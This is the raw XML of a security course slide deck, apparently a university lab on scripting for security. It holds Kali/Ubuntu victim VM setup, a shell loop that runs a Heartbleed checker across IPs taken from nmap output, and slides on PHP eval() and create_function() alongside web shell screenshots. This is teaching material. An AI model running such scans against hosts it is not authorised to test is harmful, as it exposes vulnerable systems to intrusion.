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72"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="334" r:id="rId2"/>
    <p:sldId id="352" r:id="rId3"/>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="267" r:id="rId9"/>
    <p:sldId id="281" r:id="rId10"/>
    <p:sldId id="282" r:id="rId11"/>
    <p:sldId id="500" r:id="rId12"/>
    <p:sldId id="283" r:id="rId13"/>
    <p:sldId id="327" r:id="rId14"/>
    <p:sldId id="328" r:id="rId15"/>
    <p:sldId id="329" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="507" r:id="rId23"/>
    <p:sldId id="508" r:id="rId24"/>
    <p:sldId id="278" r:id="rId25"/>
    <p:sldId id="276" r:id="rId26"/>
    <p:sldId id="348" r:id="rId27"/>
    <p:sldId id="501" r:id="rId28"/>
    <p:sldId id="349" r:id="rId29"/>
    <p:sldId id="284" r:id="rId30"/>
    <p:sldId id="285" r:id="rId31"/>
    <p:sldId id="286" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="385" r:id="rId34"/>
    <p:sldId id="367" r:id="rId35"/>
    <p:sldId id="368" r:id="rId36"/>
    <p:sldId id="369" r:id="rId37"/>
    <p:sldId id="376" r:id="rId38"/>
    <p:sldId id="377" r:id="rId39"/>
    <p:sldId id="378" r:id="rId40"/>
    <p:sldId id="509" r:id="rId41"/>
    <p:sldId id="379" r:id="rId42"/>
    <p:sldId id="380" r:id="rId43"/>
    <p:sldId id="382" r:id="rId44"/>
    <p:sldId id="386" r:id="rId45"/>
    <p:sldId id="387" r:id="rId46"/>
    <p:sldId id="333" r:id="rId47"/>
    <p:sldId id="336" r:id="rId48"/>
    <p:sldId id="317" r:id="rId49"/>
    <p:sldId id="318" r:id="rId50"/>
    <p:sldId id="331" r:id="rId51"/>
    <p:sldId id="332" r:id="rId52"/>
    <p:sldId id="319" r:id="rId53"/>
    <p:sldId id="320" r:id="rId54"/>
    <p:sldId id="347" r:id="rId55"/>
    <p:sldId id="321" r:id="rId56"/>
    <p:sldId id="388" r:id="rId57"/>
    <p:sldId id="503" r:id="rId58"/>
    <p:sldId id="504" r:id="rId59"/>
    <p:sldId id="505" r:id="rId60"/>
    <p:sldId id="506" r:id="rId61"/>
    <p:sldId id="512" r:id="rId62"/>
    <p:sldId id="514" r:id="rId63"/>
    <p:sldId id="515" r:id="rId64"/>
    <p:sldId id="516" r:id="rId65"/>
    <p:sldId id="517" r:id="rId66"/>
    <p:sldId id="518" r:id="rId67"/>
    <p:sldId id="519" r:id="rId68"/>
    <p:sldId id="520" r:id="rId69"/>
    <p:sldId id="513" r:id="rId70"/>
    <p:sldId id="502" r:id="rId7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696"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="175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E3766151-84B0-894C-AF63-A6F813034F70}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/7/22</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4960400-8F34-3D4C-8823-8D8F19637ACE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1152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B955F9-81EA-47C5-8059-9E5C2B437C70}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>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F607B-A47E-422C-9BEF-122CCDB7C526}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/7/22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3/7/22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3/7/22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0D295D-4A77-4DEB-B04C-9F4282A8BC04}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3/7/22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3/7/22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3/7/22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3/7/22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3/7/22</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3/7/22</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php.net/manual/en/function.create-function.ph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xkcd.com/323/"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base64decode.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kahusecurity.com/2010/malicious-javascript-analysi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umd.box.com/s/461tfu9kx4lgpy13sbv7kadk57mqdj9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ftp://ftp.server.i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begin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>To do some of these exercises today you’ll need a host to write code in.  I’d recommend using your Kali VM. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> We’ll also use the Ubuntu VM as it can act as a victim machine for a few exercises so boot that up as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183092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detection script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>infile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = open('hosts', 'r')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    for line in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>infile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>line.strip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('\n')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	   # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>existing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="262716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6C94-AAA6-B94D-9AA7-3A409DE9BC87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heartbleed detection script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F344050-2016-7F42-8C4E-FD9DD21C1A11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What I actually did:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shell script to run the original script that just printed out either a “WARNING - vulnerable” or “not vulnerable” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</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input=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>heart.list</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while read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>do</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heart.py</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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p 443 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>done &lt; $input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332289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detection script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List of hosts generated via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to strip out to just a list of IP addresses open on port 443.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This was a very dirty hack, I dumped script output into a file I could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> later (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grepping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for “WARNING”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If I wanted to make this a bit more robust would have written output from the script into a file in the script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397533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lots of data quickly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="Screen Shot 2016-09-20 at 9.26.43 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-29779" b="-29779"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3693379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lots of data quickly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5" descr="Screen Shot 2016-09-20 at 11.45.26 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-33015" b="-33015"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339496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lots of data quickly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-09-20 at 9.32.12 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-4317" r="-4317"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2340906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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="webshell.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-93525" b="-93525"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3947101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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="webshell2.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-28375" b="-28375"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="167419" y="1417638"/>
            <a:ext cx="7909781" cy="4983162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113173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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>create_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://php.net/manual/en/function.create-function.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2016-09-19 at 10.29.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24" y="2817725"/>
            <a:ext cx="7762276" cy="2969277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80490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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-09-19 at 10.30.08 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-26028" b="-26028"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321924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2A86-C185-634D-B0B9-7DB699BAFCE2}"/>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BDCBC1D-BA56-4B4B-89AB-05CE5847F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669" y="0"/>
            <a:ext cx="6913061" cy="6286500"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{077BBC5C-D48F-2D46-A56C-8641889F3A13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3086100" y="6375400"/>
            <a:ext cx="3514725" cy="371475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://xkcd.com/323/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271192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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="webshell3.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-83253" b="-83253"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
